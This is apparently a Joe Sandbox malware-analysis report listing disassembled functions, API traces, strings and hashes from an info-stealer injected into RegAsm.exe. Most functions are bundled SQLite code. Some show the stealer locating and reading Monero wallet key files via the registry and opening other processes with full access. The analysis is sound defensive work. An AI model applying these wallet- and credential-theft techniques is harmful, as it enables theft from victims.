Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: c49aaa62b5141cbe15973aa12150079d7d3cbd9479e4807ce3037fffb8dfe3ad
Instruction ID: 9f728c80bd2f305f4939646f7bc31748fe1c527e4e8c7188ed475034936209f6
Opcode Fuzzy Hash: c49aaa62b5141cbe15973aa12150079d7d3cbd9479e4807ce3037fffb8dfe3ad
Instruction Fuzzy Hash: 4B41CBE9A473452EEB116B24FC42FEB77999F91E14F14402CF4CF5F180DA22E446C262

Function 1B764920 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 132COMMON

Download Yara Rule

Strings

_rowid, xrefs: 1B764A57
SELECT * FROM %Q.%Q, xrefs: 1B7649AA
Schema corrupt or not an rtree, xrefs: 1B7649DC
SELECT * FROM %Q.'%q_rowid', xrefs: 1B76496D
_parent, xrefs: 1B764A6D

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT * FROM %Q.%Q$SELECT * FROM %Q.'%q_rowid'$Schema corrupt or not an rtree$_parent$_rowid
API String ID: 0-2087119806
Opcode ID: 6820741b4461074b8b8520fd7fa07b666fc9ef52ad905fdf46c52e86bd014073
Instruction ID: eb3c4e08e750c55ad34dd8dcc011d42da31176ba49465001c5b6a1f20b9d185d
Opcode Fuzzy Hash: 6820741b4461074b8b8520fd7fa07b666fc9ef52ad905fdf46c52e86bd014073
Instruction Fuzzy Hash: 0B41E1B1809351ABDB04DF64DC859EFB6EAAFD5B44F001A2DF885D3200E670E944CBA7

Function 1B80AAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B80AB0B, 1B80AB4C, 1B80ABA0
API called with NULL prepared statement, xrefs: 1B80AAD9
%s at line %d of [%.10s], xrefs: 1B80AB1A, 1B80AB5B, 1B80ABAF
misuse, xrefs: 1B80AB15, 1B80AB56, 1B80ABAA
bind on a busy prepared statement: [%s], xrefs: 1B80AB94
API called with finalized prepared statement, xrefs: 1B80AAEF

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3679126755
Opcode ID: 32f3a7c1d9aec54d8a1249d9cdecb9a899e56f22d0c64ec8f06ba918ad0d9cec
Instruction ID: 628ef7b35ecfd87c705b1c9c663379c9d3de8d18cb46cfe23ec8e8f1a25ba9d1
Opcode Fuzzy Hash: 32f3a7c1d9aec54d8a1249d9cdecb9a899e56f22d0c64ec8f06ba918ad0d9cec
Instruction Fuzzy Hash: 8041D2716007059BEB108F78EC86FDAB2A8BF54F56F060529F599AF391EB70E480C761

Function 00413B47 Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413B4C
memset.MSVCRT ref: 00413B6D
memset.MSVCRT ref: 00413B7B

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

lstrcat.KERNEL32(?,00000000), ref: 00413BA7
lstrcat.KERNEL32(?), ref: 00413BC5
lstrcat.KERNEL32(?,?), ref: 00413BD9
lstrcat.KERNEL32(?), ref: 00413BEC

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040CE0C: _EH_prolog.MSVCRT ref: 0040CE11
Part of subcall function 0040CE0C: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040CE64
Part of subcall function 0040CE0C: memcmp.MSVCRT ref: 0040CEA2

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411D80: GlobalAlloc.KERNEL32(00000000,z<A,00000000,00000000,?,00413C7A,?,?), ref: 00411D8B

StrStrA.SHLWAPI(00000000), ref: 00413C86
GlobalFree.KERNEL32(?), ref: 00413D55

Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
Part of subcall function 00406D7F: LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
Part of subcall function 00406D7F: LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

lstrcat.KERNEL32(?,00000000), ref: 00413CFB
StrCmpCA.SHLWAPI(?,004276CB,?,?,?,?,000003E8), ref: 00413D18
lstrcat.KERNEL32(?,?), ref: 00413D31
lstrcat.KERNEL32(?,004279A0), ref: 00413D3F

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 174962345-0
Opcode ID: a260a71157194137b1cc3993f1025f4378958f044595c8f92f1e21ae7150c290
Instruction ID: 5d9887e4c003d5038b5018e60cbfbd063e2c5fca256328a4f076184186ad4f89
Opcode Fuzzy Hash: a260a71157194137b1cc3993f1025f4378958f044595c8f92f1e21ae7150c290
Instruction Fuzzy Hash: 0E613CB2D00119ABCF11EFE1DC49DDE7B7DAB09304F00046AF605E3161EA399B888BA5

Function 1B735470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

%!0.15g, xrefs: 1B7354D2
%lld, xrefs: 1B73550D
JSON cannot hold BLOB values, xrefs: 1B735697

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: 47e3cc6b0e037dadcfde5ede2212d180415e25b9adf3600fabcc9c5e3348695a
Instruction ID: 0f5e1dcadce0781275ba087915c97a2ee716889fe51237fb40aa84b09d453b06
Opcode Fuzzy Hash: 47e3cc6b0e037dadcfde5ede2212d180415e25b9adf3600fabcc9c5e3348695a
Instruction Fuzzy Hash: 5E51C0BA500300AEEB105A18EC47FFF37A6DF82727F14024DF946572A3EB67B54182A1

Function 1B6B2B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

,schema HIDDEN, xrefs: 1B6B2CD2
%c"%s", xrefs: 1B6B2C1B
ABLE x, xrefs: 1B6B2BB6
("%s", xrefs: 1B6B2C4A
,arg HIDDEN, xrefs: 1B6B2C7A

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
API String ID: 0-1763475469
Opcode ID: 735e51600c71e5a2ea50f68ef6121b5f34e72b3d3882e9d6e77ebd92276ed50e
Instruction ID: 2bda6a41ddf34bdbcd4e4c172b305b9baff700da8811e5c623d19bc24c34045b
Opcode Fuzzy Hash: 735e51600c71e5a2ea50f68ef6121b5f34e72b3d3882e9d6e77ebd92276ed50e
Instruction Fuzzy Hash: 427191B4909342DBD718CF14D940B9ABBF0FFA8704F008A5EF89897251E775E549CB92

Function 00410471 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410476
??_U@YAPAXI@Z.MSVCRT ref: 0041048C
OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 004104AE
memset.MSVCRT ref: 004104F0
??_V@YAXPAX@Z.MSVCRT ref: 00410629

Part of subcall function 0040EDD8: strlen.MSVCRT ref: 0040EDEF

Part of subcall function 0040E992: memcpy.MSVCRT ref: 0040E9B2

Strings

N0ZWFt, xrefs: 00410593, 004105A0
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00410508, 004105F1

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologOpenProcessmemcpymemsetstrlen
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 3050127167-1622206642
Opcode ID: 966422a928db5018832813aa3ac74893670f6df9618f4d3b7684f2012bc649dc
Instruction ID: b4c041eae0aa711b679e6422d961e358bae5c9a4c2413e7435ff6aea28d9cb08
Opcode Fuzzy Hash: 966422a928db5018832813aa3ac74893670f6df9618f4d3b7684f2012bc649dc
Instruction Fuzzy Hash: 915180B1A04219BEDB10EF95DC81AEEBB79EF44314F10007FF105A6291DAB95EC4CB69

Function 1B72AA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B72AAB8, 1B72AD82
API called with NULL prepared statement, xrefs: 1B72AA87
%s at line %d of [%.10s], xrefs: 1B72AAC7, 1B72AD91
misuse, xrefs: 1B72AAC2, 1B72AD8C
API called with finalized prepared statement, xrefs: 1B72AA9C, 1B72AD76

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: e42da5eb9cd5d9ba5820a338e68ce88c6392977d52b05253d56ed3144a0691c1
Instruction ID: aa374fae779a5a6cb7bf09387212b69559e2a49c05aa54c534e898c1f4360db9
Opcode Fuzzy Hash: e42da5eb9cd5d9ba5820a338e68ce88c6392977d52b05253d56ed3144a0691c1
Instruction Fuzzy Hash: 89B124B4A007469FEB10AF24AC45BDF73E8AF50715F40046CF98A87381E735E489C7A2

Function 1B6B3D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

PRAGMA , xrefs: 1B6B3DC5
=%Q, xrefs: 1B6B3E7F
%Q., xrefs: 1B6B3E11

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: a6d1173411a334e2661c4dfb06b2b1d9e4e232a005fa7e6e25a70189f2df525b
Instruction ID: b840aed4b30d841310f07368d98bc4c983256bcc45d3d9e33472ca23abbe77dc
Opcode Fuzzy Hash: a6d1173411a334e2661c4dfb06b2b1d9e4e232a005fa7e6e25a70189f2df525b
Instruction Fuzzy Hash: E071E3B1B043119BDB04DF18DD85BDBB7F4AFA4714F04052AFC899B251E735E9098BA2

Function 00401C6B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 179stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401C70
memset.MSVCRT ref: 00401C8E

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

lstrcat.KERNEL32(?,00000000), ref: 00401CB2
lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
lstrcat.KERNEL32(?,.keys), ref: 00401CDA

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

memset.MSVCRT ref: 00401E9D

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401C98
wallet_path, xrefs: 00401C93
.keys, xrefs: 00401CCE
\Monero\wallet.keys, xrefs: 00401D03

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1518627966-218353709
Opcode ID: dedd2ad2299014ab515a3ad46d61034aa91dbba9348d77fadc13e3f741acd75d
Instruction ID: 3914f70d52a7f87d44e10450272fae8133ffe176783504dfd2c68362267608a7
Opcode Fuzzy Hash: dedd2ad2299014ab515a3ad46d61034aa91dbba9348d77fadc13e3f741acd75d
Instruction Fuzzy Hash: D2718071D00249AADB04EBE4D856BDDBB78AF18308F54405EE515B31C2EFB82788CB69

Function 1B69B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3155648f890b6cd39e2a517c8874802e3ab01cd829446ac9663af1261074bc
Instruction ID: 0df049b811f71382663f7ca9cac701db1e87043752e799f4d832ba990b2824f4
Opcode Fuzzy Hash: 1f3155648f890b6cd39e2a517c8874802e3ab01cd829446ac9663af1261074bc
Instruction Fuzzy Hash: EB816BF5804386CFCB008F24A9417EABBA0AF61600FCC056CE8D5D729ADB35D885CBD2

Function 1B6DF600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
